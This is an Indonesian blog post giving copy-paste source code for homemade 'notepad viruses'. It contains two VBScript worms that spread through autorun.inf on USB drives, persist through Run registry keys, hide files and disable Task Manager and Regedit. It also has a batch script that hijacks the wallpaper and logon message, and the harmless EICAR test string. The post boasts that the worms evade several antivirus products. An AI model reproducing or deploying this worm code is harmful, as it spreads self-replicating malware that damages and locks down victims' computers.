Jumat, 05 Agustus 2011

Triks Membuat virus dengan notepad

Mungkin bagi master pembuat virus artikel ini tidak berguna, tapi bagi yang belum tau trik ini boleh dicoba. Sangatlah gampang, virus sederhana Anda akan tercipta hanya dengan bermodalkan copy paste dan program notepad, yang penting source codenya harus dicompile dulu. Bahkan virus yang paling sederhana pun dapat Anda buat, sekedar untuk mengecek ampuhnya Anti Virus yang Anda miliki. Artikel kali ini aku dapatkan dari blog - blog hacker pembuat virus dengan hanya menggunakan notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menunggu User menjalankan infector-nya.


Berikut virus - virus sederhana yang dapat Anda buat hanya dengan menggunakan notepad :


  1. Virus ini di beri nama Kalong.VBS oleh penciptanya. Virus sederhana dengan menggunakan notepad. Buka notepad-nya. Silahkan Copy kode pada kolom di bawah ini. ‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//


    on error resume next

    ‘//–Dim kata-kata berikut ini–//
    dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

    ‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
    isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
    set fs = createobject(“Scripting.FileSystemObject”)
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text = mf.openastextstream(1,-2)
    do while not text.atendofstream
    rekur = rekur & text.readline
    rekur = rekur & vbcrlf
    loop
    do

    ‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
    Set windowpath = fs.getspecialfolder(0)
    set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
    tf.attributes = 32
    set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
    tf.write rekursif
    tf.close
    set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
    tf.attributes = 39
    ‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
    ‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

    for each flashdrive in fs.drives
    ‘//–Cek Drive–//
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

    ‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
    set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
    tf.write rekursif
    tf.close
    set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
    tf.attributes = 39

    ‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
    set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
    tf.write isi
    tf.close
    set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes=39
    end if
    next

    ‘//–Manipulasi Registry–//

    set kalong = createobject(“WScript.Shell”)

    ‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
    kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

    ‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
    kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

    ‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
    kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
    kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
    kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
    kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
    kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

    ‘//–Manip – Disable klik kanan–//
    kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

    ‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
    kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

    ‘//–Manip – Aktif setiap Windows Startup–//
    kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

    ‘//–Manip – Ubah RegisteredOwner dan Organization–//
    kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
    kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

    ‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
    if check <> 1 then
    Wscript.sleep 200000
    end if
    loop while check <> 1
    set sd = createobject(“Wscript.shell”)
    sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
    ‘Akhir dari Kode


    Save code di Notepad dengan cara FILE >> SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Virus Worm ini, lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
  2. Virus ini efeknya tidak terlalu berbahaya. efek dari virus ini hanya mengganti tampilan dari windows saja. Tapi sedikit bikin kaget juga, karena hampir tidak terdeteksi oleh Anti Virus. Virus ini hanya aktif dan bisa bekerja pada Windows XP. caranya? Buka notepad lalu copy paste dan di edit terlebih dulu script di bawah ini :


    @echo off
    copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
    copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
    copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
    copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
    copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
    copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
    reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
    reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
    reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
    reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
    reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
    reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
    reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f


    Lalu di SAVE AS ALL FILES dengan exstensi .bat misal : nama_file.bat. Kemudian buat Autorun.inf dengan script :

    [autorun]
    open=nama_file.bat


    Lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf). File - file tersebut harus dalam 1 direktori, lalu seleksi file - file tersebut, klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY, copy file-file tersebut ke CD dan nikmati efeknya.
  3. Virus notepad berikutnya adalah virus yang sangat berbahaya. Buka program notepad. Copy paste scrib di bawah ini, simpan dengan nama ganas_banget.exe.vbs


    ‘El Magnifico MAN
    on error resume next
    dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
    atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
    set fs = createobject(“Scripting.FileSystemObject”)
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
    mysource=mysource&text.readline
    mysource=mysource & vbcrlf
    loop
    do
    Set winpath = fs.getspecialfolder(0)
    set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
    tf.attributes = 32
    set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
    tf.write mysource
    tf.close
    set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
    tf.attributes = 39
    for each flashdrive in fs.drives
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
    set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
    tf.write mysource
    tf.close
    set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
    tf.attributes =39
    set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
    tf.write atr
    tf.close
    set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes=39
    end if
    next
    set rg = createobject(“WScript.Shell”)
    rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
    rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,”"
    rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
    if check 1 then
    Wscript.sleep 100000
    end if
    loop while check1
    set sd = createobject(“Wscript.shell”)
    sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

    do while year(now) >= 2008
    WScript.sleep 20000

    msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
    “ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
    “dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
    “iko permainan yang paten ma dunsanak” & vbcrlf & _
    vbcrlf & vbcrlf & _
    ” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
    ” aaa kini saaiknyo ma dunsanak”

    loop
  4. Virus yang terakhir hanyalah sekedar pengetes Anti Virus Anda. Ini adalah script sederhana (virus ringan katakanlah) buat sekedar ngetes antivirus. Saat disimpan kalo tidak terjadi apa - apa, berarti memang antivirus itu teramat jelek maka perlu diganti.

    X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

    Copy paste source code diatas ke notepad abis itu coba simpan dengan nama apa saja terserah Anda.




referensi : berbagai sumber

Tidak ada komentar:

Posting Komentar